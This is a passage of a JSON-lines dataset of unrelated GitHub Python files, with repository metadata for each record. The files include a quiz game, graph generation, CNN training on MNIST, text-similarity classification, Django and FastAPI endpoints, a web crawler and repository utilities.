new_player[0].lower()=='y':\r\n return 'yes'\r\n elif new_player[0].lower()=='n':\r\n return 'no'\r\n else:\r\n print('Invalid entry. Try again.')\r\n player_on=True\r\n except:\r\n print('Invalid entry. Try again.')\r\n player_on=True\r\n \r\n#function deals with number of questions wanted \r\ndef no_of_questions(): \r\n \r\n on=True \r\n while on: # loop deals with invalid entries including out of range entries\r\n try:\r\n question_amount=int(input('how many questions (max 10) would you like to answer?: ')) \r\n if question_amount in range(1,11): \r\n return question_amount \r\n else:\r\n print('Invalid entry. Try again')\r\n on=True\r\n except:\r\n print('Invalid entry. 
Try again')\r\n on=True \r\n\r\n \r\n#call function and start game\r\nmain()\r\n\r\n\r\n \r\n \r\n","repo_name":"GiselleVicatos/Portfolio","sub_path":"multiplayer_quiz_source_code.py","file_name":"multiplayer_quiz_source_code.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41833713107","text":"import random\nfrom networkx import *\nimport matplotlib.pyplot as plt\n\n\ndef get_random_graph(hsize):\n # graph generation\n honest_subgraph = erdos_renyi_graph(hsize, 0.8)\n for i in range(hsize):\n honest_subgraph.nodes[i][\"type\"] = 'honest'\n\n # largest connected component\n honest_subgraph = honest_subgraph.subgraph(max(nx.connected_components(honest_subgraph), key=len)).copy()\n diameter = algorithms.distance_measures.diameter(honest_subgraph)\n density = classes.function.density(honest_subgraph)\n honest_size = len(honest_subgraph)\n\n byzantine_size = (honest_size - 1) // 2 # number of byzantine nodes\n honest_subgraph = convert_node_labels_to_integers(honest_subgraph, first_label=byzantine_size)\n\n byzantine_subgraph = Graph()\n # adding nodes\n for i in range(byzantine_size):\n byzantine_subgraph.add_node(i, type='byzantine')\n\n total_size = byzantine_size + honest_size\n\n byzantine_output = []\n for i in range(byzantine_size):\n byzantine_output.append(i)\n\n G = compose(honest_subgraph, byzantine_subgraph)\n\n # byzantine connectivity\n for i in range(byzantine_size):\n for j in range(byzantine_size, byzantine_size + honest_size):\n if random.random() < 0.9:\n G.add_edge(i, j)\n\n # coloring graph\n colorList = []\n for node in G.nodes(data=True):\n if node[1][\"type\"] == 'byzantine':\n colorList.append(\"red\")\n else:\n colorList.append(\"blue\")\n\n # drawing graph\n draw_networkx(G, node_color=colorList)\n plt.savefig(\"random_graph.png\")\n plt.clf()\n\n # adjacency list generation\n adjList = {}\n for i in range(byzantine_size + honest_size):\n adjList[i] = [n for n in G.neighbors(i)]\n\n return adjList, byzantine_output, total_size, diameter, density\n\n\ndef get_linear_graph(bsize):\n byzantine_size = bsize # number of byzantine nodes\n honest_size = 2 * byzantine_size + 1 # number of honest nodes\n diameter = honest_size - 1\n total_size = byzantine_size + honest_size\n\n byzantine_output = []\n for i in range(byzantine_size):\n byzantine_output.append(i)\n\n # graph generation\n G = Graph()\n\n # coloring graph\n colorList = []\n for i in range(byzantine_size):\n colorList.append('r')\n\n for i in range(honest_size):\n colorList.append('b')\n\n # adding nodes\n for i in range(byzantine_size):\n G.add_node(i, type='byzantine')\n\n for i in range(honest_size):\n G.add_node(byzantine_size + i, type='honest')\n\n # adding edges\n for i in range(byzantine_size):\n for j in range(byzantine_size, byzantine_size + honest_size):\n if random.random() < 0.8:\n G.add_edge(i, j)\n\n for i in range(honest_size - 1):\n G.add_edge(byzantine_size + i, byzantine_size + i + 1)\n\n # drawing graph\n draw_networkx(G, node_color=colorList)\n plt.savefig(\"linear_graph.png\")\n plt.clf()\n\n # adjacency list generation\n adjList = {}\n\n for i in range(byzantine_size + honest_size):\n adjList[i] = [n for n in G.neighbors(i)]\n\n density = 2*honest_size/((honest_size-1)*honest_size)\n\n return adjList, byzantine_output, total_size, diameter, 
density\n\n","repo_name":"matthew-ding/primes-project-2021","sub_path":"graphGenerator.py","file_name":"graphGenerator.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10326055314","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom mnist import get_dataset\nfrom model import Net\nimport matplotlib.pyplot as plt # グラフ出力用module\nimport os\nfrom pathlib import Path\n\nBATCH_SIZE = 100\nWEIGHT_DECAY = 0.005\nLEARNING_RATE = 0.0001\nEPOCH = 25\n\n\ndef get_device(device_type):\n if device_type is not None:\n return torch.device(device_type)\n elif hasattr(torch.backends, \"mps\") and torch.backends.mps.is_available():\n return torch.device(\"mps\")\n elif torch.cuda.is_available():\n return torch.device(\"cuda\")\n else:\n return torch.device(\"cpu\")\n\n\ndef main():\n trainloader, testloader = get_dataset(\"./data\")\n\n # GPUの定義\n device = get_device()\n\n # モデルの定義\n net = Net()\n net = net.to(device)\n\n # 誤差関数の定義\n criterion = nn.CrossEntropyLoss()\n\n # 最適化手法の定義\n optimizer = optim.SGD(\n net.parameters(), lr=LEARNING_RATE, momentum=0.9, weight_decay=WEIGHT_DECAY\n )\n # 学習\n loss_value, acc_value, net = training(\n device, net, trainloader, testloader, criterion, optimizer\n )\n\n # モデルの保存\n if not os.path.isdir(\"./result\"):\n os.mkdir(\"./result\")\n p = Path(\"./result\")\n torch.save(net.state_dict(), str(p / \"latest.pth\"))\n\n # 可視化\n output_graph(loss_value, acc_value)\n\n\ndef training(device, net, trainloader, testloader, criterion, optimizer):\n loss_value = [] # testのlossを保持するlist\n acc_value = [] # testのaccuracyを保持するlist\n\n for epoch in range(EPOCH):\n # トレーニング\n for (inputs, labels) in trainloader:\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n sum_loss = 0.0\n sum_correct = 0\n sum_total = 0\n\n # テスト\n with torch.no_grad():\n for (inputs, labels) in testloader:\n inputs, labels = inputs.to(device), labels.to(device)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n sum_loss += loss.item()\n _, predicted = outputs.max(1)\n sum_total += labels.size(0)\n sum_correct += (predicted == labels).sum().item()\n\n loss_rate = sum_loss * BATCH_SIZE / len(testloader.dataset)\n accuracy = float(sum_correct / sum_total)\n print(f\"[{epoch + 1:3d}] loss={loss_rate:8.6f}, accuracy={accuracy:8.6f}\")\n\n loss_value.append(sum_loss * BATCH_SIZE / len(testloader.dataset))\n acc_value.append(float(sum_correct / sum_total))\n\n return loss_value, acc_value, net\n\n\ndef output_graph(loss_value, acc_value, path=\"./result\"):\n # グラフ描画用\n plt.figure(figsize=(6, 6))\n\n if not os.path.isdir(path):\n os.mkdir(path)\n p = Path(path)\n\n xlim = len(loss_value)\n # 以下グラフ描画\n plt.plot(range(xlim), loss_value)\n plt.xlim(0, xlim)\n plt.ylim(0, 2.5)\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"LOSS\")\n plt.legend([\"loss\"])\n plt.title(\"loss\")\n plt.savefig(str(p / \"loss_image.png\"))\n plt.clf()\n\n xlim = len(acc_value)\n plt.plot(range(xlim), acc_value)\n plt.xlim(0, xlim)\n plt.ylim(0, 1)\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"ACCURACY\")\n plt.legend([\"acc\"])\n plt.title(\"accuracy\")\n plt.savefig(str(p / \"accuracy_image.png\"))\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"tshrt-boop/sample-cnn","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14250318776","text":"'''\r\nCreated on 2018年8月8日\r\n\r\n@author: Admin\r\n'''\r\n\r\nfrom LightMysql import LightMysql\r\nimport logging\r\nimport numpy\r\nfrom zhcnSegment import Seg\r\nfrom collections import defaultdict\r\nfrom regular import checkData\r\nfrom sentenceSimilarity import SentenceSimilarity\r\n\r\ndef trainData():\r\n # 配置信息,其中host, port, user, passwd, db为必需\r\n dbconfig = {'host':'127.0.0.1',\r\n 'port': 3306,\r\n 'user':'root',\r\n 'passwd':'root',\r\n 'db':'ah_q_text_classify',\r\n 'charset':'utf8'}\r\n result = None\r\n try:\r\n QUERY_ALL_ALARMOBJET = \" SELECT\"\r\n QUERY_ALL_ALARMOBJET += \" question ,label_2\"\r\n QUERY_ALL_ALARMOBJET += \" FROM q_original_lable \";\r\n QUERY_ALL_ALARMOBJET += \" WHERE 1=1 and status=1 \"\r\n db = LightMysql(dbconfig) # 创建LightMysql对象,若连接超时,会自动重连\r\n sql_select = QUERY_ALL_ALARMOBJET\r\n# print(sql_select)\r\n result, colmun = db.query(sql_select, 'all') # 返回有多少行\r\n except Exception as e:\r\n logging.error(e)\r\n finally:\r\n if(db != None):\r\n db.close() # 操作结束,关闭对象\r\n return result \r\n\r\ndef readDictData(original_ss, dict):\r\n values = []\r\n with open('ah_data_2.txt', encoding='utf-8') as f:\r\n line = f.readline()\r\n while line:\r\n data = line.split(':')\r\n dict[data[1]] = data[0]\r\n values.append(data[1])\r\n \r\n line = f.readline()\r\n \r\n original_ss.set_sentences(values)\r\n\r\n\r\n\r\n\r\n# 用于周末的比对\r\ndata = trainData()\r\ntrain_data = numpy.array(data)[:, 0]\r\nlable = numpy.array(data)[:, 1]\r\n\r\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\r\nX_train, X_test, Y_train, Y_test = train_test_split(train_data, lable, test_size=0.1, random_state=0, shuffle=True)\r\ndef dictTest():\r\n dict = {}\r\n seg = Seg()\r\n original_ss = SentenceSimilarity(seg)\r\n readDictData(original_ss, dict)\r\n original_ss.TfidfModel()\r\n# original_ss.LdaModel()\r\n# original_ss.LsiModel()\r\n total_data_len = len(X_test)\r\n success_len = 0\r\n f1 = open('ah_data_lsi.txt', 'w', encoding='utf-8')\r\n for i in range(len(X_test)):\r\n print(\"-------------------------------------\")\r\n text = checkData(X_test[i]);\r\n text = \"\".join(seg.cut_for_search(text))\r\n print(\"测试内容: \" + text)\r\n \r\n try :\r\n sentences = original_ss.similarityArray(text)\r\n sentences = sorted(sentences, key=lambda e:e.get_score(), reverse=True)\r\n count = 0\r\n for sentence in sentences:\r\n if sentence.get_score() > 0.9:\r\n print(sentence.get_score())\r\n \r\n if sentence.get_score() == 1.0:\r\n count = count + 1\r\n \r\n sentence = original_ss.similarity(text)\r\n if count < 2 and dict.get(sentence.get_origin_sentence()) == Y_test[i]:\r\n success_len = success_len + 1\r\n else:\r\n y = Y_test[i]\r\n f1.writelines(\"-------------------------------------\\n\")\r\n f1.writelines(\"测试内容: \" + text + \"\\n\")\r\n for sentence in sentences:\r\n f1.writelines(\"匹配标签: 【\" + dict.get(sentence.get_origin_sentence()) + \"】 真实标签:【\" + y + \"】 评分: \" + str(sentence.get_score()) + \"\\n\")\r\n except Exception as e:\r\n print(e)\r\n print(success_len / total_data_len)\r\n\r\ndictTest()\r\n\r\n\r\n\r\n# from sklearn.model_selection import train_test_split, KFold, cross_val_score\r\n# X_train, X_test, Y_train, Y_test = train_test_split(train_data, lable, test_size=0.1, random_state=0, 
shuffle=True) \r\n# \r\n# print(\"train len : %d\" % len(X_train))\r\n# print(\"test len : %d\" % len(X_test))\r\n# \r\n# # 根据类别拼接成一个句子\r\n# dict = {}\r\n# seg = Seg()\r\n# for i in range(len(X_train)):\r\n# key = Y_train[i]\r\n# value = X_train[i]\r\n# text = checkData(value);\r\n# text = seg.cut_for_search(text)\r\n# print(\"\".join(text))\r\n# # print(success_len / total_data_len)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Peterzwb/tfidfClassify","sub_path":"similar/computing_word_test.py","file_name":"computing_word_test.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"10347470404","text":"#import pwb\n\n'''\nhttps://en.wikisource.org/wiki/Index:The_Kiss_and_Other_Stories_by_Anton_Tchekhoff,_1908.pdf\n\npage info: https://en.wikisource.org/w/index.php?title=Index:The_Kiss_and_Other_Stories_by_Anton_Tchekhoff,_1908.pdf&action=info\n\nGives wikidata id as\nhttps://www.wikidata.org/wiki/Special:EntityPage/Q89675998\n\nBut it has low details.\n\nThis has high details\nhttps://www.wikidata.org/wiki/Q15839163\n\n\n'''\n\n\nimport pywikibot\nsite = pywikibot.Site('en', 'wikisource.beta.wmflabs.org') # any site will work, this is just an example\npage = pywikibot.Page(site, 'Index:War_and_Peace.djvu')\nprint(page)\nitem = pywikibot.ItemPage.fromPage(page) \nprint(item)\n\n# [[wikidata:Q89675998]]\n\n\n'''\n\nsite = pywikibot.Site('', 'wikisource') # any site will work, this is just an example\npage = pywikibot.Page(site, 'Index:The Kiss and Other Stories by Anton Tchekhoff, 1908.pdf')\nitem = pywikibot.ItemPage.fromPage(page) \nprint(item)\n'''\n","repo_name":"tshrinivasan/wikisource_wikidata_integration","sub_path":"bot/extra/search-in-wikidata.py","file_name":"search-in-wikidata.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"391089071","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom .views import FriendViewSet, ProfileViewSet, SearchViewSet, MyPageView\n\n\nrouter = routers.DefaultRouter()\nrouter.register(\"friends\", FriendViewSet)\nrouter.register(\"profiles\", ProfileViewSet, basename=\"profile\")\nrouter.register(\"search\", SearchViewSet)\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n path(\"mypage/\", MyPageView.as_view(), name=\"my-page\"),\n]\n","repo_name":"LeeJuHwan/DjangoTutorial","sub_path":"sns_api_practice/config/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23547857233","text":"#!/usr/bin/env python\n\n\"\"\"@package docstring\nFile: nematic_order.py\nAuthor: Adam Lamson\nEmail: alamson@flatironinstitute.org\nDescription:\n\"\"\"\nimport numpy as np\n\n\ndef calc_nematic_order(syls):\n \"\"\"Calculate the nematic order parameter for a set of syls\n\n :syls: Raw sylinder data from HDF5 file. 
PBCs should be applied.\n :returns: Array of nematic order parameters for each frame\n\n \"\"\"\n \n # Get necessary derived functions\n directions = syls[:,5:8, :] - syls[:, 2:5, :] \n lengths = np.linalg.norm(directions, axis=1)\n unit_dirs = directions / lengths[:, None, :]\n n_syls = syls.shape[0]\n\n # nematic_tensor averaged over all sylinders\n nematic_tensor = (np.einsum('ijk,ilk->jlk', unit_dirs, unit_dirs) \n - np.eye(3)[:,:,None]/3.)/n_syls\n \n nematic_order = []\n for i in range(nematic_tensor.shape[2]):\n nematic_order.append(np.max(np.linalg.eigvals(nematic_tensor[:,:,i])))\n\n ## Possible vectorized version\n # ufunc_eigvals = np.vectorize(np.linalg.eigvals, signature='(n)->()')\n # nematic_order = np.max(ufunc_eigvals(nematic_tensor, axis=(0,1)), axis=0)\n\n return np.array(nematic_order)\n \n\n","repo_name":"flatironinstitute/aLENS_analysis","sub_path":"alens_analysis/nematic_order.py","file_name":"nematic_order.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5142438603","text":"import s3fs\nimport pandas\n\n\nclass DataLoader:\n @classmethod\n def load_data(\n cls,\n receiver_id: str,\n receivers_data_bucket: str,\n ) -> list:\n '''\n Retrieve the last 40 days of a receiver's S3-hosted data as a list.\n \n \n In[1] : DataLoader.load_data(\n receiver_id=\"receiver#00000001\",\n receivers_data_bucket=\"receivers-data\",\n )\n \n Out[1]: [31, 30, 29, ..., 10, 11, 10]\n \n '''\n last_40_days_data_series = (\n pandas\n .read_csv(\n f\"s3://{receivers_data_bucket}/{receiver_id}/data.csv\",\n header=None,\n index_col=0, \n squeeze=True,\n )\n .tail(40)\n )\n\n return last_40_days_data_series.values.tolist()\n","repo_name":"zinedine-zeitnot/anomaly-detection","sub_path":"functions/loadData/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36690906545","text":"#실습\r\n# 네이버 최신 1000건의 평점 데이터를 그롤링하여\r\n# 테이블을 만들고 리뷰수가 10회 이상이면서\r\n# 평점이 8 이상인 영화를 추천하시오\r\n\r\n\r\nfrom urlToStr2 import urlToStr\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef naverCraw(page) :\r\n data=urlToStr(\"https://movie.naver.com/movie/point/af/list.nhn?&page=\"+page)\r\n\r\n bs = BeautifulSoup(data, \"html.parser\")\r\n\r\n tit3s=bs.select(\"tbody>tr\")\r\n\r\n cnt=0\r\n datars=[]\r\n for tit3 in tit3s :\r\n cnt=cnt+1\r\n datars1=[]\r\n mvname = tit3.find(\"a\").text\r\n star = int(tit3.find(\"em\").text)\r\n writer = tit3.select_one(\".author\").text\r\n cdate = tit3.find_all(\"td\")[2].text.split(\"****\")[1]\r\n datars1.append(mvname)\r\n datars1.append(star)\r\n datars1.append(writer)\r\n datars1.append(cdate)\r\n #print(cnt, \":\", mvname, star, writer, cdate)\r\n datars1=tuple(datars1)\r\n datars.append(datars1)\r\n #print(datars1)\r\n #print(\"-\"*30)\r\n\r\n return datars\r\n\r\nif __name__ == \"__main__\" :\r\n datars=naverCraw(\"2\")\r\n print(datars)\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"hwsonnn/python_crawling","sub_path":"희원_python/!_0206__movie_!.py","file_name":"!_0206__movie_!.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42724388324","text":"import FWCore.ParameterSet.Config as cms\n\n\nfrom MyEDmodules.HcalTimingAnalyzer.hcalFilteredReco_cff import *\n\nhfrhfilt06ns.detIds2Mask = cms.vint32(-32,45,2)\nhfrhfilt10ns.detIds2Mask = 
cms.vint32(-32,45,2)\nhfrhfilt1ts.detIds2Mask = cms.vint32(-32,45,2)\nhfrhfilt4ts.detIds2Mask = cms.vint32(-32,45,2)\n\n#--------------------------------------------------\n# Shifted filters -> feed into towers, MET, etc.\n# faster than feeding hbherhshift in, can do them in parallel\n#\nhbherhfiltshp.timeShiftNs = cms.double(25.0)\nhorhfiltshp.timeShiftNs = cms.double(25.0)\n\n#--------------------------------------------------\n# Shifted \"un\"filters -> have to be all set up from scratch\n\nunfiltTowersShift = towerMaker.clone()\nunfiltTowersShift.hbheInput = cms.InputTag(\"hbherhshift\")\nunfiltTowersShift.hoInput = cms.InputTag(\"horhshift\")\nunfiltTowersShift.hfInput = cms.InputTag(\"hfrhshift\")\nunfiltmetNoHFshift = metNoHF.clone(src = \"unfiltTowersShift\")\nmyanunfiltShift = myan.clone()\nmyanunfiltShift.eventDataPset.hbheRechitLabel = cms.untracked.InputTag(\"hbherhshift\")\nmyanunfiltShift.eventDataPset.hoRechitLabel = cms.untracked.InputTag(\"horhshift\")\nmyanunfiltShift.eventDataPset.hfRechitLabel = cms.untracked.InputTag(\"hfrhshift\")\n\nrhshift = cms.Sequence(hbherhshift+horhshift+hfrhshift)\nunfiltShift = cms.Sequence(rhshift*\n unfiltTowersShift*\n unfiltmetNoHFshift*\n myanunfiltShift)\n\ntimeFiltSeqShifted = cms.Sequence(unfiltShift*filtshp)\n\nhbherhfiltshp.rhProfilingPset = cms.untracked.PSet(\n thresholds = cms.untracked.vdouble(4.0,7.5,10.0,15.0))\n","repo_name":"pdudero/usercode","sub_path":"MyEDmodules/HcalTimingAnalyzer/python/hcalFilteredReco4CRAFTshifted_cff.py","file_name":"hcalFilteredReco4CRAFTshifted_cff.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71532234001","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfifa = pd.read_csv('fifa_data.csv')\r\nfifa.head()\r\n\r\nplt.figure(figsize=(8,5), dpi=100)\r\nplt.title('Distribution of skill level in fifa 2018')\r\nbins = [40,50,60,70,80,90,100]\r\nplt.hist(fifa.Overall, bins=bins)\r\nplt.xticks(bins)\r\nplt.xlabel('Skill level')\r\nplt.ylabel('Number of players')\r\nplt.savefig('distribution.png')\r\nplt.show();","repo_name":"heisdenverr/sentimentanalysis","sub_path":"spider-demo/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10585621396","text":"# https://docs.python.org/3/library/configparser.html\nimport configparser\n# https://github.com/python/cpython/tree/3.6/Lib/configparser.py\n# Java의 Properties처럼, config 파일을 읽고 쓰기 위한 라이브러리\n# 백엔드 어플리케이션의 설정을 관리한다고 가정하고, config를 read/write하도록 해보자\n\nconfig = configparser.ConfigParser()\n\nconfig['MongoDB'] = {\n 'host': 'localhost',\n 'port': 27017,\n 'db': 'Awesome'\n}\n\nconfig['RUN-SETTING'] = {\n 'port': 5000,\n 'debug': True\n}\n\nwith open('config.conf', 'w') as file:\n config.write(file)\n\nconfig.read('config.conf')\n\nprint(config['MongoDB'])\n# <Section: MongoDB>\n\nfor k, v in config['MongoDB'].items():\n print(k, v)\n # key, value는 무조건 str\n\nprint(config['RUN-SETTING']['debug'])\n# 'True'\n\nprint(config['RUN-SETTING'].getboolean('debug'))\n# True","repo_name":"JoMingyu/--Awesome-Python--","sub_path":"000. 
Python Standard Library/File Formats/configparser - Configuration file parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"ko","doc_type":"code","stars":190,"dataset":"github-code","pt":"3"} +{"seq_id":"34625279758","text":"from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, HTTPException, Path, UploadFile, File, Form\nfrom starlette import status\nfrom pydantic import BaseModel, Field\n\nfrom database import SessionLocal\nfrom models import Product\n\nrouter = APIRouter(\n prefix='/product',\n tags=['products']\n)\n\n\nclass ProductRequest(BaseModel):\n name: str\n image: UploadFile = None\n price: int\n display_order: int\n remaining_quantity: int\n is_active: bool\n filial: str\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n\n finally:\n db.close()\n\n\n@router.get('/', status_code=status.HTTP_200_OK)\nasync def get_all_products(db: Session = Depends(get_db)):\n result = db.query(Product).all()\n if result:\n return result\n\n raise HTTPException(status_code=404, detail='Products not found.')\n\n\n@router.get('/{product_id}', status_code=status.HTTP_200_OK)\nasync def get_current_products(product_id: int, db: Session = Depends(get_db)):\n current_product = db.query(Product).filter(Product.id == product_id).first()\n if current_product:\n return current_product\n\n raise HTTPException(status_code=404, detail='Products not found.')\n\n\n@router.post('/add-product', status_code=status.HTTP_201_CREATED)\nasync def add_product(db: Session = Depends(get_db), product_request: ProductRequest = Depends(ProductRequest)):\n\n product_model = Product(name=product_request.name,\n image=product_request.image.filename,\n price=product_request.price,\n display_order=product_request.display_order,\n remaining_quantity=product_request.remaining_quantity,\n is_active=product_request.is_active,\n filial=product_request.filial)\n db.add(product_model)\n db.commit()\n\n\n@router.put('/update-product/{product_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def update_product(product_id: int, db: Session = Depends(get_db),\n product_request: ProductRequest = Depends(ProductRequest)):\n\n product_model = db.query(Product).filter(Product.id == product_id).first()\n\n if product_model is None:\n raise HTTPException(status_code=404, detail='Product not found.')\n\n product_model.name = product_request.name\n product_model.image = product_request.image.filename\n product_model.price = product_request.price\n product_model.display_order = product_request.display_order\n product_model.remaining_quantity = product_request.remaining_quantity\n product_model.is_active = product_request.is_active\n product_model.filial = product_request.filial\n\n db.add(product_model)\n db.commit()\n\n\n@router.delete('/delete-product/{product_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_product(product_id: int, db: Session = Depends(get_db)):\n product_model = db.query(Product).filter(Product.id == product_id).first()\n if product_model is None:\n raise HTTPException(status_code=404, detail='Product not found.')\n\n db.query(Product).filter(Product.id == product_id).delete()\n db.commit()\n","repo_name":"BM021/Marketing_app","sub_path":"routers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7380010350","text":"from selenium import webdriver\nimport unittest\n\nbrowser = 
webdriver.Chrome(\"/Users/bradWaterhouse/Downloads/chromedriver\")\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_experimental_option(\"detach\", True)\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--disable-infobars\")\nchrome_options.add_experimental_option(\"prefs\", {\n \"profile.default_content_setting_values.notifications\": 2\n})\n\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_page_has_rendered_correctly(self):\n chrome_options.add_experimental_option(\"detach\", True)\n browser.get('https://www.bunches.co.uk')\n\n self.assertTrue(browser.find_element_by_xpath('/html/body/div[2]/div/div[2]/div[1]/div[1]/a/img').is_displayed())\n self.assertTrue(browser.find_element_by_xpath('// *[ @ id = \"navigation-menu\"] / li[1] / div / a').is_displayed())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BradWaterhouse/selenium-testing","sub_path":"tests/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73867179920","text":"from flaskweb import db\r\nimport datetime\r\n\r\ndef meanRating(services):\r\n for j in services:\r\n length = len(j['Rating'])\r\n if length == 0:\r\n j['meanRating'] = 0\r\n else:\r\n sum1 = sum(j['Rating'])\r\n meanRating = sum1 / length\r\n meanRating = round(meanRating, 1)\r\n j['meanRating'] = meanRating\r\n services = sorted(services, key=lambda k: -(k.get('meanRating')))\r\n return services\r\n\r\ndef getServices(name):\r\n cursor = db.Services.find({'Type':name})\r\n services = []\r\n for i in cursor:\r\n services.append(i)\r\n services = meanRating(services)\r\n return services\r\n\r\ndef getInfo(name, id_):\r\n data = getServices(name)\r\n for i in data:\r\n if str(i.get('id_')) == id_:\r\n return i\r\n\r\ndef updateRating(name, id_, rating):\r\n alist = db.Services.find_one({'Type': name, 'id_': int(id_)}).get('Rating')\r\n alist.append(int(rating))\r\n db.Services.update_one(\r\n {'type': name, 'id_': int(id_)},\r\n {'$set': {\r\n 'rating': alist\r\n }}\r\n )\r\n\r\ndef updateFavorite(email, service_name, service_id):\r\n alist = db.user.find_one({'email': email}).get('favorite')\r\n service = {'Type': service_name, 'id_': service_id}\r\n if service not in alist:\r\n alist.insert(0, service)\r\n db.user.update_one(\r\n {'email': email},\r\n {'$set': {\r\n 'favorite': alist\r\n }}\r\n )\r\n return 'success'\r\n else:\r\n return 'fail'\r\n\r\ndef getFavorite(email):\r\n alist = db.user.find_one({'email': email}).get('favorite')\r\n favoData = []\r\n for i in alist:\r\n favoData.append(getInfo(i['Type'], i['id_']))\r\n return favoData\r\n\r\n\r\ndef pass_today():\r\n dic = {'0':'Monday', '1':'Tuesday', '2':'Wednesday', '3':'Thursday',\r\n '4':'Friday', '5':'Saturday', '6':'Sunday'}\r\n day = datetime.datetime.today().weekday()\r\n return dic[str(day)]\r\n","repo_name":"xhua167/IE2","sub_path":"flaskweb/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74026978001","text":"import os\nfrom .common import *\nfrom pathlib import Path\nfrom typing import List, Union\nimport requests\nimport time\n\nRETRY_MAX_NUM = os.getenv(\"RETRY_MAX_NUM\", 5) #最大重试次数(默认五次)\nRETRY_INTERVAL = os.getenv(\"RETRY_INTERVAL\", 3) #重试间隔时间(默认3秒)\n\ndef startswith(p: Path, start: Path) -> bool:\n try:\n p.relative_to(str(start.resolve()))\n 
return True\n except Exception as e:\n return False\n\n\ndef get_project_root(p: Path) -> Path:\n \"\"\"获取 Project 根目录\n \"\"\"\n while str(p.resolve()) != \"/\":\n if is_project_dir(p):\n return p\n p = p.resolve().parent\n return None\n\n\ndef get_konfig_root() -> Path:\n \"\"\"获取大库根目录\n \"\"\"\n p = Path(os.getcwd())\n while str(p.resolve()) != \"/\":\n if (p / KCLMOD_FILE).is_file() and (p / HACK_DIR).is_dir():\n return p\n p = p.resolve().parent\n return Path(os.getcwd())\n\n\ndef get_konfig_projects() -> List[Path]:\n \"\"\"获取大库所有 project 目录\n \"\"\"\n result = []\n for project_dir, _, _ in os.walk(get_konfig_root()):\n project_dir = Path(project_dir)\n if is_project_dir(project_dir):\n result.append(project_dir)\n return result\n\n\ndef get_konfig_projects_relative() -> List[Path]:\n \"\"\"获取大库所有 project 相对于根目录的路径\n \"\"\"\n project_dirs = get_konfig_projects()\n konfig_root = get_konfig_root()\n return [item.relative_to(konfig_root) for item in project_dirs]\n\ndef get_changed_files_from_oss(change_paths_url):\n \"\"\"从OSS获取文件变更列表\n \"\"\"\n times = 0 #重试计数\n while times < RETRY_MAX_NUM:\n try:\n down_res = requests.get(change_paths_url)\n if not down_res:\n raise Exception(f'Empty down resource: {down_res}')\n down_res_content = down_res.content\n if not down_res_content:\n raise Exception(f'Empty down resource content: {down_res_content}')\n change_paths_str = down_res_content.decode()\n break\n except Exception as e:\n times += 1\n if times >= RETRY_MAX_NUM:\n print(f'>> Exceed maximal retry {RETRY_MAX_NUM}, Raise exception...')\n raise(e) # will stop the program without further handling\n else:\n time.sleep(RETRY_INTERVAL)\n print(f'>> Exception, Retry {times} begins...')\n return change_paths_str\n\ndef is_project_dir(p: Path) -> 